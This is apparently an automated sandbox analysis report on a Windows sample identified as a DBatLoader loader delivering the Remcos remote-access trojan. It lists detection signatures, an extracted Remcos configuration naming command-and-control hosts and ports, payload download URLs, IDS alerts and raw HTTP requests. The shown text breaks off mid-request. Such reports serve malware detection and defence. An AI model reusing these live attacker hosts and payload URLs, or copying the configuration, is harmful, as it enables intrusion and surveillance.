Windows Analysis Report
jlPBMMQbXC.exe

Overview

General Information

Sample name: jlPBMMQbXC.exe
renamed because original name is a hash value
Original sample name: 0225dcd9b2e37389e781d34d3027a1882ada68b4282089105bc637f4d8139561.exe
Analysis ID: 1562864
MD5: a27b6de588ad4d4c0d6e0c656e580f4e
SHA1: 48d25bbc2e65bd22678ca45d2b53b4ca8ce8059f
SHA256: 0225dcd9b2e37389e781d34d3027a1882ada68b4282089105bc637f4d8139561
Tags: doganalecmdexeuser-JAMESWT_MHT
Infos:

Detection

DBatLoader, Remcos
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Found malware configuration
Icon mismatch, binary includes an icon from a different legit application in order to fool users
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Creates a thread in another existing process (thread injection)
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Uses dynamic DNS services
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
DBatLoader This Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader
Name Description Attribution Blogpost URLs Link
Remcos, RemcosRAT Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

AV Detection

barindex
Source: jlPBMMQbXC.exe Avira: detected
Source: archived.zapto.org Avira URL Cloud: Label: malware
Source: honeypotresearchteam.duckdns.org Avira URL Cloud: Label: malware
Source: C:\Users\Public\Libraries\Selebzih.PIF Avira: detection malicious, Label: TR/AD.Nekark.mucip
Source: jlPBMMQbXC.exe Malware Configuration Extractor: DBatLoader {"Download Url": ["https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1", "https://lightstone.ae/image/233_Selebzihtih"]}
Source: 00000008.00000002.3861881906.00000000025DD000.00000004.00000020.00020000.00000000.sdmp Malware Configuration Extractor: Remcos {"Host:Port:Password": ["pentester0.accesscam.org:56796:1", "archived.zapto.org:56797:1", "honeypotresearchteam.duckdns.org:13939:1"], "Assigned name": "Resignation Letter", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "Resignation.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Resignation-X9RTX9", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "resignation", "Keylog folder": "wetransfer"}
Source: C:\Users\Public\Libraries\Selebzih.PIF ReversingLabs: Detection: 63%
Source: jlPBMMQbXC.exe ReversingLabs: Detection: 63%
Source: Yara match File source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR
Source: Submited Sample Integrated Neural Analysis Model: Matched 98.9% probability
Source: C:\Users\Public\Libraries\Selebzih.PIF Joe Sandbox ML: detected
Source: jlPBMMQbXC.exe Joe Sandbox ML: detected
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_291638C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 8_2_291638C8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_004338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 15_2_004338C8
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_078045E5 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 15_2_078045E5
Source: SndVol.exe Binary or memory string: -----BEGIN PUBLIC KEY-----

Exploits

barindex
Source: Yara match File source: 15.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.442191d.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d191d.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.4420000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.29130000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.4420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d191d.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.442191d.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.SndVol.exe.29130000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.colorcpl.exe.77d0000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.1792665550.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3862154789.0000000004420000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.3877541973.0000000029130000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.1794055073.00000000077D0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: SndVol.exe PID: 7672, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: colorcpl.exe PID: 8136, type: MEMORYSTR

Privilege Escalation

barindex
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29137538 _wcslen,CoGetObject, 8_2_29137538
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00407538 _wcslen,CoGetObject, 15_2_00407538
Source: jlPBMMQbXC.exe Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown HTTPS traffic detected: 13.107.136.10:443 -> 192.168.2.9:49723 version: TLS 1.2
Source: unknown HTTPS traffic detected: 162.19.139.102:443 -> 192.168.2.9:49746 version: TLS 1.2
Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdb source: jlPBMMQbXC.exe, jlPBMMQbXC.exe, 00000000.00000002.1577348813.00000000023E6000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9E0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1386950607.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000006.00000003.1564129488.0000000005420000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
Source: Binary string: easinvoker.pdbH source: jlPBMMQbXC.exe, 00000000.00000003.1534458535.000000007EB20000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1627250031.000000007F2B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1534140532.000000007EBF0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: easinvoker.pdbGCTL source: jlPBMMQbXC.exe, 00000000.00000002.1577348813.00000000023E6000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E41E000.00000004.00000020.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9F7000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9E0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1578952321.0000000002C7E000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000002.1586422166.000000000D9B0000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1386950607.000000007FC90000.00000004.00001000.00020000.00000000.sdmp, jlPBMMQbXC.exe, 00000000.00000003.1555406818.000000000E44F000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: cmd.pdb source: esentutl.exe, 00000006.00000003.1564129488.0000000005420000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C55908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA, 0_2_02C55908
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29138847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 8_2_29138847
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29137877 FindFirstFileW,FindNextFileW, 8_2_29137877
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2917E8F9 FindFirstFileExA, 8_2_2917E8F9
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2913BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 8_2_2913BB6B
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29149B86 FindFirstFileW,FindNextFileW,FindNextFileW, 8_2_29149B86
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2913BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 8_2_2913BD72
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2914C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 8_2_2914C322
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2913C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 8_2_2913C388
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_2913928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_2913928E
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_291396A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 8_2_291396A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0040928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 15_2_0040928E
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0041C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 15_2_0041C322
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0040C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 15_2_0040C388
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_004096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 15_2_004096A0
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00408847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 15_2_00408847
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00407877 FindFirstFileW,FindNextFileW, 15_2_00407877
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0044E8F9 FindFirstFileExA, 15_2_0044E8F9
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0040BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 15_2_0040BB6B
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_00419B86 FindFirstFileW,FindNextFileW,FindNextFileW, 15_2_00419B86
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0040BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 15_2_0040BD72
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_0781F616 FindFirstFileExA, 15_2_0781F616
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077D9564 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose, 15_2_077D9564
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077D8594 FindFirstFileW,FindNextFileW, 15_2_077D8594
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077DA3BD __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose, 15_2_077DA3BD
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077ED03F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose, 15_2_077ED03F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077DD0A5 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose, 15_2_077DD0A5
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077D9FAB __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose, 15_2_077D9FAB
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077DCA8F FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose, 15_2_077DCA8F
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077EA8A3 FindFirstFileW, 15_2_077EA8A3
Source: C:\Windows\SysWOW64\colorcpl.exe Code function: 15_2_077DC888 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose, 15_2_077DC888
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29137CD2 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW, 8_2_29137CD2

Networking

barindex
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49763 -> 103.186.117.159:56796
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49813 -> 103.186.117.159:13939
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49823 -> 103.186.117.159:56796
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49824 -> 103.186.117.159:13939
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49825 -> 103.186.117.159:56796
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49826 -> 103.186.117.159:13939
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49827 -> 103.186.117.159:56796
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49830 -> 103.186.117.159:13939
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49829 -> 103.186.117.159:56796
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49828 -> 103.186.117.159:13939
Source: Network traffic Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.9:49831 -> 103.186.117.159:56796
Source: Malware configuration extractor URLs: https://alfanar01-my.sharepoint.com/:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1
Source: Malware configuration extractor URLs: https://lightstone.ae/image/233_Selebzihtih
Source: Malware configuration extractor URLs: pentester0.accesscam.org
Source: Malware configuration extractor URLs: archived.zapto.org
Source: Malware configuration extractor URLs: honeypotresearchteam.duckdns.org
Source: global traffic TCP traffic: 103.186.117.159 ports 5,6,7,56796,13939,9
Source: unknown DNS query: name: honeypotresearchteam.duckdns.org
Source: C:\Users\user\Desktop\jlPBMMQbXC.exe Code function: 0_2_02C6E4B8 InternetCheckConnectionA, 0_2_02C6E4B8
Source: global traffic TCP traffic: 192.168.2.9:49763 -> 103.186.117.159:56796
Source: Joe Sandbox View IP Address: 13.107.136.10 13.107.136.10
Source: Joe Sandbox View ASN Name: CENTURYLINK-US-LEGACY-QWESTUS CENTURYLINK-US-LEGACY-QWESTUS
Source: Joe Sandbox View ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Source: Joe Sandbox View JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49723 -> 13.107.136.10:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49746 -> 162.19.139.102:443
Source: Network traffic Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.9:49729 -> 13.107.136.10:443
Source: global traffic HTTP traffic detected: GET /:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: alfanar01-my.sharepoint.com
Source: global traffic HTTP traffic detected: GET /personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: alfanar01-my.sharepoint.comCookie: FedAuth=77u/PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0idXRmLTgiPz48U1A+VjEzLDBoLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uI2Q3NzQ2ZGY2NmVlODk4Nzc5MTI0YzAxMTEwNWZkZTJlZTgyZTI3NTUzNGMwNmMyMjBiOWNlZjQyNGMxNzNjMzAsMCMuZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jZDc3NDZkZjY2ZWU4OTg3NzkxMjRjMDExMTA1ZmRlMmVlODJlMjc1NTM0YzA2YzIyMGI5Y2VmNDI0YzE3M2MzMCwxMzM3NzA3OTAzNDAwMDAwMDAsMCwxMzM3NzE2NTEzNDk3ODEzMTksMC4wLjAuMCwyNTgsOTE3NDIwNjMtZmNjYy00Y2JhLWIzNGItNjliZTU0ZTQ4NGU4LCwsZDE5NzY3YTEtNzBmOS1hMDAwLTcwZGMtNmI4OGUwYmM1NThkLGQxOTc2N2ExLTcwZjktYTAwMC03MGRjLTZiODhlMGJjNTU4ZCxMMEhrZGdUY3pVcTFOaGcwM2VZM2ZRLDAsMCwwLCwsLDI2NTA0Njc3NDM5OTk5OTk5OTksMCwsLCwsLCwwLCwxODk3NDksdVhlaFFKUGxlVmpOQ2Jha1VoR0Q2SXlGUVFrLGlQNFZYR2cwTkFVRFJwaHJxS0ZTK1ZDM3RFT0dkTnVqeWhZaGRkNm4yMVJqVUxIYjVQUE9QQkY3SkgyczF3cWZtU0RrTWQzanV2My82RzlEWTRrdE9vbzQ0VnAvb085WE1iL2ExSnBJWVBieHFab3Z4bm9tSk5YVWYwK0Vwd3VHU2pzOEROSitPOExnUGlYeGtYV2hLMGY0YTNpZXRqOUJNTWJTWXJiYXBJc0pMZEk0YlI2MXhFZjhvK242TmJZM0s0VmNXOEJ0Sk5MZzhpZEJIQVdFOVlFZVhKY3pZMk1OQkpHcElMRzcvczFRODVla09MUVVacjA5TmlnOUY4YlIxRi9FN1lQV1NZcmxEeHBjK0hwTVlnYkZ6cEREQjQyQnZBTnRhRUt0MEhTSS9CRElRMXg2Y2VHZ0EyQ29qTkhCOHhoVjJ2TzFOOVltaWdoSDVuZFZuUT09PC9TUD4=
Source: global traffic HTTP traffic detected: GET /image/233_Selebzihtih HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: lightstone.ae
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\SysWOW64\SndVol.exe Code function: 8_2_29156D42 recv, 8_2_29156D42
Source: global traffic HTTP traffic detected: GET /:u:/g/personal/huzaifa_alfanargas_com/EbcBi98Fae9PrYH7LpmiSQMBlKcC8bPaqfGiqmGYrLTf6w?e=8qbxqz&download=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: alfanar01-my.sharepoint.com
Source: global traffic HTTP traffic detected: GET /personal/huzaifa_alfanargas_com/Documents/233_Selebzihtih?ga=1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: alfanar01-my.sharepoint.comCookie: 